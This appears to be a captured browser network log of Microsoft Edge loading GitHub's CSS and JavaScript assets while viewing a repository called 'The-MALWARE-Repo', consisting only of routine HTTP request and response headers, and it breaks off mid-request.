origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: text/css,*/*;q=0.1
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: style
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: text/css
last-modified: Tue, 27 Aug 2024 20:36:01 GMT
etag: "0x8DCC6D7DD54695E"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Sat, 05 Oct 2024 16:06:04 GMT
age: 2200570
x-served-by: cache-iad-kcgs7200095-IAD, cache-ams2100121-AMS
x-cache: HIT, HIT
x-cache-hits: 22, 30302
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: e6197fecb3c78d8d18457e1a879da433b1e31e44
content-length: 6804
GET

https://github.githubassets.com/assets/global-a2362f933f32.css

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/global-a2362f933f32.css HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: text/css,*/*;q=0.1
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: style
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: text/css
last-modified: Fri, 04 Oct 2024 13:44:32 GMT
etag: "0x8DCE47AAD62514C"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Sat, 05 Oct 2024 16:06:04 GMT
age: 85393
x-served-by: cache-iad-kcgs7200072-IAD, cache-ams2100121-AMS
x-cache: HIT, HIT
x-cache-hits: 33, 3340
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 6b53c29b24084d533af37df612d87908f5204002
content-length: 38228
GET

https://github.githubassets.com/assets/repos-overview.47b2222c697daf78496d.module.css

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/repos-overview.47b2222c697daf78496d.module.css HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: text/css,*/*;q=0.1
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: style
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: text/css
last-modified: Mon, 26 Aug 2024 16:36:35 GMT
etag: "0x8DCC5ED40102C90"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Sat, 05 Oct 2024 16:06:04 GMT
age: 3365469
x-served-by: cache-iad-kjyo7100027-IAD, cache-ams2100121-AMS
x-cache: HIT, HIT
x-cache-hits: 14, 17428
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: a6540c481b1ceeb520ab3d795d67d73c9673fe5b
content-length: 220
GET

https://github.githubassets.com/assets/primer-fefb1a332c28.css

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/primer-fefb1a332c28.css HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: text/css,*/*;q=0.1
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: style
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: text/css
last-modified: Tue, 24 Sep 2024 17:30:44 GMT
etag: "0x8DCDCBE9F00AF9E"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Sat, 05 Oct 2024 16:06:04 GMT
age: 927069
x-served-by: cache-iad-kiad7000111-IAD, cache-ams2100121-AMS
x-cache: HIT, HIT
x-cache-hits: 99, 33623
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 8563caad4c59cead35289b3ce09213673f9e8483
content-length: 38553
GET

https://github.githubassets.com/assets/github-d1e3b63864f7.css

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/github-d1e3b63864f7.css HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: text/css,*/*;q=0.1
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: style
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: text/css
last-modified: Tue, 27 Aug 2024 20:35:59 GMT
etag: "0x8DCC6D7DBFA7D4F"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Sat, 05 Oct 2024 16:06:04 GMT
age: 3346220
x-served-by: cache-iad-kiad7000157-IAD, cache-ams2100121-AMS
x-cache: HIT, HIT
x-cache-hits: 9327, 30343
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 243c363f2d9be8fe7f3754efbe5a77113c5dfb9f
content-length: 6876
GET

https://github.githubassets.com/assets/code-016b94b6763c.css

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/code-016b94b6763c.css HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: text/css,*/*;q=0.1
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: style
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: text/css
last-modified: Tue, 03 Sep 2024 18:51:51 GMT
etag: "0x8DCCC497906BD46"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Sat, 05 Oct 2024 16:06:04 GMT
age: 2733740
x-served-by: cache-iad-kiad7000060-IAD, cache-ams2100121-AMS
x-cache: HIT, HIT
x-cache-hits: 3821, 30621
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 0cf794ae5fa5d376e2c46f8f1e9ae5b88baa2d2a
content-length: 1582
GET

https://github.githubassets.com/assets/repository-0f7cf89e325a.css

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/repository-0f7cf89e325a.css HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: text/css,*/*;q=0.1
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: style
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Wed, 02 Oct 2024 18:46:05 GMT
etag: "0x8DCE31279037ABD"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Sat, 05 Oct 2024 16:06:04 GMT
age: 181489
x-served-by: cache-iad-kjyo7100111-IAD, cache-ams2100121-AMS
x-cache: MISS, HIT
x-cache-hits: 0, 4838
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 78edb40f985436ded572bf1668495e2c3a426994
content-length: 7283
GET

https://github.githubassets.com/assets/primer-react.a38d782b719dc67594c9.module.css

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/primer-react.a38d782b719dc67594c9.module.css HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: text/css,*/*;q=0.1
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: style
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Thu, 03 Oct 2024 20:05:18 GMT
etag: "0x8DCE3E6B45F8510"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Sat, 05 Oct 2024 16:06:04 GMT
age: 156965
x-served-by: cache-iad-kiad7000108-IAD, cache-ams2100121-AMS
x-cache: MISS, HIT
x-cache-hits: 0, 6407
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 24b730b631a2e4ac97359fbc3350569c6ed6680a
content-length: 5011
GET

https://github.githubassets.com/assets/notifications-subscriptions-menu.1bcff9205c241e99cff2.module.css

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/notifications-subscriptions-menu.1bcff9205c241e99cff2.module.css HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: text/css,*/*;q=0.1
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: style
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: text/css
last-modified: Mon, 26 Aug 2024 16:36:35 GMT
etag: "0x8DCC5ED402F5138"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Sat, 05 Oct 2024 16:06:04 GMT
age: 3365470
x-served-by: cache-iad-kjyo7100173-IAD, cache-ams2100121-AMS
x-cache: HIT, HIT
x-cache-hits: 34, 25438
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 88dd9b60f88a1f6ba757740c401f8ee2c69b188a
content-length: 5050
GET

https://github.githubassets.com/assets/dark-9c5b7a476542.css

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/dark-9c5b7a476542.css HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: text/css,*/*;q=0.1
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: style
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: text/css
last-modified: Wed, 02 Oct 2024 18:46:03 GMT
etag: "0x8DCE3127785B438"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Sat, 05 Oct 2024 16:06:04 GMT
age: 181517
x-served-by: cache-iad-kiad7000142-IAD, cache-ams2100121-AMS
x-cache: HIT, HIT
x-cache-hits: 17, 8227
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: acec8bc7705b366eb7ec751389e65d3b81aa2913
content-length: 5324
GET

https://github.githubassets.com/assets/primer-primitives-4cf0d59ab51a.css

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/primer-primitives-4cf0d59ab51a.css HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: text/css,*/*;q=0.1
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: style
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: text/css
last-modified: Mon, 26 Aug 2024 16:36:17 GMT
etag: "0x8DCC5ED35736954"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Sat, 05 Oct 2024 16:06:04 GMT
age: 2193474
x-served-by: cache-iad-kjyo7100115-IAD, cache-ams2100121-AMS
x-cache: HIT, HIT
x-cache-hits: 15, 24851
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 7b4d3ea517c117ea9e56284fb400b00122e7ae58
content-length: 479
GET

https://github.githubassets.com/assets/ui_packages_paths_index_ts-6d26e38db34f.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/ui_packages_paths_index_ts-6d26e38db34f.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: text/css
last-modified: Thu, 03 Oct 2024 17:56:29 GMT
etag: "0x8DCE3D4B5888247"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Sat, 05 Oct 2024 16:06:04 GMT
age: 85382
x-served-by: cache-iad-kiad7000093-IAD, cache-ams2100121-AMS
x-cache: HIT, HIT
x-cache-hits: 23, 2219
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: b537b245df939c6b9e6c2655e52ed0ea4b97c43f
content-length: 5141
GET

https://github.githubassets.com/assets/vendors-node_modules_github_catalyst_lib_index_js-node_modules_github_hydro-analytics-client_-d56e55-4533ead6a048.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/vendors-node_modules_github_catalyst_lib_index_js-node_modules_github_hydro-analytics-client_-d56e55-4533ead6a048.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: text/css
last-modified: Fri, 27 Sep 2024 21:40:48 GMT
etag: "0x8DCDF3D0D4C7710"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Sat, 05 Oct 2024 16:06:04 GMT
age: 423839
x-served-by: cache-iad-kcgs7200067-IAD, cache-ams2100121-AMS
x-cache: HIT, HIT
x-cache-hits: 43, 17378
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: c662918c01e6f1b746af9fdb34b177cc9eeab271
content-length: 21170
GET

https://github.githubassets.com/assets/vendors-node_modules_tanstack_query-core_build_modern_queryObserver_js-node_modules_tanstack_-defd52-7aa5ebad499a.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/vendors-node_modules_tanstack_query-core_build_modern_queryObserver_js-node_modules_tanstack_-defd52-7aa5ebad499a.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Tue, 24 Sep 2024 22:14:24 GMT
etag: "0x8DCDCE63FB53FCA"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Sat, 05 Oct 2024 16:06:04 GMT
age: 763630
x-served-by: cache-iad-kcgs7200152-IAD, cache-ams2100121-AMS
x-cache: HIT, HIT
x-cache-hits: 21, 17027
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: e2e8b1d07b399734eff145fa24f23b5696076ceb
content-length: 3088
GET

https://github.githubassets.com/assets/ui_packages_analytics-provider_analytics-provider_ts-ui_packages_aria-live_aria-live_ts-ui_pa-17c1b5-15d543eaf9e0.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/ui_packages_analytics-provider_analytics-provider_ts-ui_packages_aria-live_aria-live_ts-ui_pa-17c1b5-15d543eaf9e0.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Fri, 04 Oct 2024 15:02:49 GMT
etag: "0x8DCE4859CBF93CF"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Sat, 05 Oct 2024 16:06:04 GMT
age: 85391
x-served-by: cache-iad-kcgs7200095-IAD, cache-ams2100121-AMS
x-cache: HIT, HIT
x-cache-hits: 27, 2303
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 66da24a5d20bfd4f6888755ad2aa4bc1ebfe3fae
content-length: 2981
GET

https://github.githubassets.com/assets/vendors-node_modules_tanstack_query-core_build_modern_query_js-node_modules_tanstack_react-qu-e4a133-25f9fad0b763.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/vendors-node_modules_tanstack_query-core_build_modern_query_js-node_modules_tanstack_react-qu-e4a133-25f9fad0b763.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Tue, 24 Sep 2024 22:14:24 GMT
etag: "0x8DCDCE63FB566AE"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Sat, 05 Oct 2024 16:06:04 GMT
age: 763630
x-served-by: cache-iad-kcgs7200063-IAD, cache-ams2100121-AMS
x-cache: HIT, HIT
x-cache-hits: 21, 17101
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 49d9ef981efd6bbe7df89fcca7174458e83370fb
content-length: 4392
GET

https://github.githubassets.com/assets/ui_packages_ref-selector_RefSelector_tsx-02f89169f75f.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/ui_packages_ref-selector_RefSelector_tsx-02f89169f75f.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Fri, 04 Oct 2024 19:37:26 GMT
etag: "0x8DCE4ABFA3A01B6"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Sat, 05 Oct 2024 16:06:04 GMT
age: 62846
x-served-by: cache-iad-kcgs7200055-IAD, cache-ams2100121-AMS
x-cache: HIT, HIT
x-cache-hits: 29, 2110
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: accc169a1711837faa8a99d00ac43b6d5dceff6a
content-length: 14183
GET

https://github.githubassets.com/assets/ui_packages_commit-checks-status_index_ts-ui_packages_use-analytics_use-analytics_ts-ui_packa-51deed-5473b509efc1.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/ui_packages_commit-checks-status_index_ts-ui_packages_use-analytics_use-analytics_ts-ui_packa-51deed-5473b509efc1.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Fri, 04 Oct 2024 17:55:25 GMT
etag: "0x8DCE49DB953E29B"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Sat, 05 Oct 2024 16:06:04 GMT
age: 70448
x-served-by: cache-iad-kiad7000113-IAD, cache-ams2100121-AMS
x-cache: HIT, HIT
x-cache-hits: 18, 1562
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 16020909535c4168f860cde03e05e64e230eff85
content-length: 14398
GET

https://github.githubassets.com/assets/ui_packages_code-view-shared_components_SharedMarkdownContent_tsx-ui_packages_copy-to-clipboa-b2118b-53fd9e2a3d94.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/ui_packages_code-view-shared_components_SharedMarkdownContent_tsx-ui_packages_copy-to-clipboa-b2118b-53fd9e2a3d94.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Fri, 04 Oct 2024 19:13:54 GMT
etag: "0x8DCE4A8B025BF32"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Sat, 05 Oct 2024 16:06:04 GMT
age: 70448
x-served-by: cache-iad-kcgs7200178-IAD, cache-ams2100121-AMS
x-cache: HIT, HIT
x-cache-hits: 18, 1565
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 3e5a8f904d595ac94d7b76906efd9a662c5a3b69
content-length: 8537
GET

https://github.githubassets.com/assets/ui_packages_code-view-shared_hooks_use-canonical-object_ts-ui_packages_code-view-shared_hooks-53e534-f556cfc1bed5.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/ui_packages_code-view-shared_hooks_use-canonical-object_ts-ui_packages_code-view-shared_hooks-53e534-f556cfc1bed5.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
